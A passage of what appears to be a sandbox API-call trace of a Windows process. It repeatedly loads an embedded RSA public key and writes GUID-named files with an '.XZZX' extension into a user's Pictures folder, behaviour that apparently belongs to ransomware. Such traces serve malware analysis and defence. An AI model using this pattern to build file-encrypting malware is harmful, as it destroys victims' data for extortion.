dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0193.946] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\458E0A5920995C6664D2F42D236440AE.XZZX") returned 80 [0193.946] StrStrW (lpFirst="BD094FF047045CCAB6A2A1584B394112.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 735 os_tid = 0xe10 [0194.102] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0194.102] lstrcpyW (in: lpString1=0x2caf460, lpString2="C22D6D6701D063BFF430045506304807.XZZX" | out: lpString1="C22D6D6701D063BFF430045506304807.XZZX") returned="C22D6D6701D063BFF430045506304807.XZZX" [0194.102] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0194.102] SetErrorMode (uMode=0x1) returned 0x1 [0194.102] lstrcpyW (in: lpString1=0x2caf860, lpString2="C22D6D6701D063BFF430045506304807.XZZX" | out: lpString1="C22D6D6701D063BFF430045506304807.XZZX") returned="C22D6D6701D063BFF430045506304807.XZZX" [0194.102] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xd530e0b, Data2=0x7190, Data3=0x4882, Data4=([0]=0xb8, [1]=0x81, [2]=0xb0, [3]=0x11, [4]=0xf8, [5]=0x68, [6]=0x99, [7]=0x9))) returned 0x0 [0194.102] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C22D6D6701D063BFF430045506304807.XZZX") returned 80 [0194.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0194.102] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\27EAC130202A2B200D530E0B22F50F68.XZZX") returned 80 [0194.102] StrStrW (lpFirst="C22D6D6701D063BFF430045506304807.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 736 os_tid = 0xe14 [0194.258] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0194.258] lstrcpyW (in: lpString1=0x2caf460, lpString2="C30CF4F82E58715357484B18328D559B.XZZX" | out: lpString1="C30CF4F82E58715357484B18328D559B.XZZX") returned="C30CF4F82E58715357484B18328D559B.XZZX" [0194.258] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0194.258] SetErrorMode (uMode=0x1) returned 0x1 [0194.258] lstrcpyW (in: lpString1=0x2caf860, lpString2="C30CF4F82E58715357484B18328D559B.XZZX" | out: lpString1="C30CF4F82E58715357484B18328D559B.XZZX") returned="C30CF4F82E58715357484B18328D559B.XZZX" [0194.258] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xb89a4783, Data2=0x8237, Data3=0x4440, Data4=([0]=0x9a, [1]=0x21, [2]=0xcc, [3]=0x8, [4]=0x50, [5]=0x75, [6]=0x35, [7]=0xb8))) returned 0x0 [0194.258] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C30CF4F82E58715357484B18328D559B.XZZX") returned 80 [0194.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0194.258] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\0175E32522B729C0B89A478325820E08.XZZX") returned 80 [0194.258] StrStrW (lpFirst="C30CF4F82E58715357484B18328D559B.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 737 os_tid = 0xe18 [0194.414] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0194.414] lstrcpyW (in: lpString1=0x2caf460, lpString2="C355F5402BEDF72E504955A0300EDB76.XZZX" | out: lpString1="C355F5402BEDF72E504955A0300EDB76.XZZX") returned="C355F5402BEDF72E504955A0300EDB76.XZZX" [0194.414] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0194.414] SetErrorMode (uMode=0x1) returned 0x1 [0194.414] lstrcpyW (in: lpString1=0x2caf860, lpString2="C355F5402BEDF72E504955A0300EDB76.XZZX" | out: lpString1="C355F5402BEDF72E504955A0300EDB76.XZZX") returned="C355F5402BEDF72E504955A0300EDB76.XZZX" [0194.414] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xf4ff4cbc, Data2=0xb68f, Data3=0x4b6b, Data4=([0]=0x9b, [1]=0x43, [2]=0xd8, [3]=0xab, [4]=0xe0, [5]=0x89, [6]=0xb7, [7]=0x39))) returned 0x0 [0194.414] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C355F5402BEDF72E504955A0300EDB76.XZZX") returned 80 [0194.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0194.414] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\5B29850435C832C5F4FF4CBC3893170D.XZZX") returned 80 [0194.415] StrStrW (lpFirst="C355F5402BEDF72E504955A0300EDB76.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 738 os_tid = 0xe1c [0194.570] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0194.570] lstrcpyW (in: lpString1=0x2caf460, lpString2="C87868381959CC9C63DBF2EC1D8EB0E4.XZZX" | out: lpString1="C87868381959CC9C63DBF2EC1D8EB0E4.XZZX") returned="C87868381959CC9C63DBF2EC1D8EB0E4.XZZX" [0194.570] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0194.570] SetErrorMode (uMode=0x1) returned 0x1 [0194.570] lstrcpyW (in: lpString1=0x2caf860, lpString2="C87868381959CC9C63DBF2EC1D8EB0E4.XZZX" | out: lpString1="C87868381959CC9C63DBF2EC1D8EB0E4.XZZX") returned="C87868381959CC9C63DBF2EC1D8EB0E4.XZZX" [0194.570] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xf73e44e8, Data2=0xd816, Data3=0x47c2, Data4=([0]=0xa4, [1]=0x89, [2]=0x24, [3]=0x70, [4]=0x36, [5]=0x45, [6]=0xc7, [7]=0xde))) returned 0x0 [0194.570] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C87868381959CC9C63DBF2EC1D8EB0E4.XZZX") returned 80 [0194.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0194.570] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C97DABF03C91DAACF73E44E83F5CBEF4.XZZX") returned 80 [0194.570] StrStrW (lpFirst="C87868381959CC9C63DBF2EC1D8EB0E4.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 739 os_tid = 0xe20 [0194.726] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0194.726] lstrcpyW (in: lpString1=0x2caf460, lpString2="D2FBB85013E759FE97CF4AF0181D3E46.XZZX" | out: lpString1="D2FBB85013E759FE97CF4AF0181D3E46.XZZX") returned="D2FBB85013E759FE97CF4AF0181D3E46.XZZX" [0194.726] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0194.726] SetErrorMode (uMode=0x1) returned 0x1 [0194.726] lstrcpyW (in: lpString1=0x2caf860, lpString2="D2FBB85013E759FE97CF4AF0181D3E46.XZZX" | out: lpString1="D2FBB85013E759FE97CF4AF0181D3E46.XZZX") returned="D2FBB85013E759FE97CF4AF0181D3E46.XZZX" [0194.726] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x21757168, Data2=0x3110, Data3=0x4b50, Data4=([0]=0xa2, [1]=0xc8, [2]=0xc8, [3]=0x8b, [4]=0x16, [5]=0x85, [6]=0x83, [7]=0x9b))) returned 0x0 [0194.726] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\D2FBB85013E759FE97CF4AF0181D3E46.XZZX") returned 80 [0194.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0194.727] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\920BFE800E6F0500217571681139E948.XZZX") returned 80 [0194.727] StrStrW (lpFirst="D2FBB85013E759FE97CF4AF0181D3E46.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 740 os_tid = 0xe24 [0194.882] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0194.882] lstrcpyW (in: lpString1=0x2caf460, lpString2="D3D882303025B5406F9968D234469988.XZZX" | out: lpString1="D3D882303025B5406F9968D234469988.XZZX") returned="D3D882303025B5406F9968D234469988.XZZX" [0194.882] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0194.882] SetErrorMode (uMode=0x1) returned 0x1 [0194.882] lstrcpyW (in: lpString1=0x2caf860, lpString2="D3D882303025B5406F9968D234469988.XZZX" | out: lpString1="D3D882303025B5406F9968D234469988.XZZX") returned="D3D882303025B5406F9968D234469988.XZZX" [0194.882] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xb82b52f, Data2=0x22c4, Data3=0x4c41, Data4=([0]=0xae, [1]=0x5b, [2]=0x4d, [3]=0xd7, [4]=0x63, [5]=0xfe, [6]=0x12, [7]=0xd0))) returned 0x0 [0194.882] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\D3D882303025B5406F9968D234469988.XZZX") returned 80 [0194.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0194.882] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2C22F5FC0A5B03C40B82B52F0D25E80C.XZZX") returned 80 [0194.882] StrStrW (lpFirst="D3D882303025B5406F9968D234469988.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 741 os_tid = 0xe28 [0195.038] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0195.038] lstrcpyW (in: lpString1=0x2caf460, lpString2="D59AAFC73FFFF3FE126A516D4420D846.XZZX" | out: lpString1="D59AAFC73FFFF3FE126A516D4420D846.XZZX") returned="D59AAFC73FFFF3FE126A516D4420D846.XZZX" [0195.038] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0195.038] SetErrorMode (uMode=0x1) returned 0x1 [0195.038] lstrcpyW (in: lpString1=0x2caf860, lpString2="D59AAFC73FFFF3FE126A516D4420D846.XZZX" | out: lpString1="D59AAFC73FFFF3FE126A516D4420D846.XZZX") returned="D59AAFC73FFFF3FE126A516D4420D846.XZZX" [0195.038] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x721c7d18, Data2=0xe8f, Data3=0x40f8, Data4=([0]=0xae, [1]=0x15, [2]=0x30, [3]=0xcd, [4]=0xc7, [5]=0xa0, [6]=0xa7, [7]=0x69))) returned 0x0 [0195.038] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\D59AAFC73FFFF3FE126A516D4420D846.XZZX") returned 80 [0195.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0195.038] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4CC1306803B1DA88721C7D18067CBED0.XZZX") returned 80 [0195.038] StrStrW (lpFirst="D59AAFC73FFFF3FE126A516D4420D846.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 742 os_tid = 0xe2c [0195.194] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0195.194] lstrcpyW (in: lpString1=0x2caf460, lpString2="D5D72CD040472A6053677EF544680EA8.XZZX" | out: lpString1="D5D72CD040472A6053677EF544680EA8.XZZX") returned="D5D72CD040472A6053677EF544680EA8.XZZX" [0195.194] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0195.194] SetErrorMode (uMode=0x1) returned 0x1 [0195.194] lstrcpyW (in: lpString1=0x2caf860, lpString2="D5D72CD040472A6053677EF544680EA8.XZZX" | out: lpString1="D5D72CD040472A6053677EF544680EA8.XZZX") returned="D5D72CD040472A6053677EF544680EA8.XZZX" [0195.194] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x8740917e, Data2=0xbdf3, Data3=0x44ed, Data4=([0]=0xaa, [1]=0x77, [2]=0x42, [3]=0xe0, [4]=0x4a, [5]=0x1, [6]=0x6d, [7]=0x19))) returned 0x0 [0195.194] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\D5D72CD040472A6053677EF544680EA8.XZZX") returned 80 [0195.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0195.194] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\0DB4209A332465F78740917E35EF4A3F.XZZX") returned 80 [0195.194] StrStrW (lpFirst="D5D72CD040472A6053677EF544680EA8.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 743 os_tid = 0xe30 [0195.350] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC 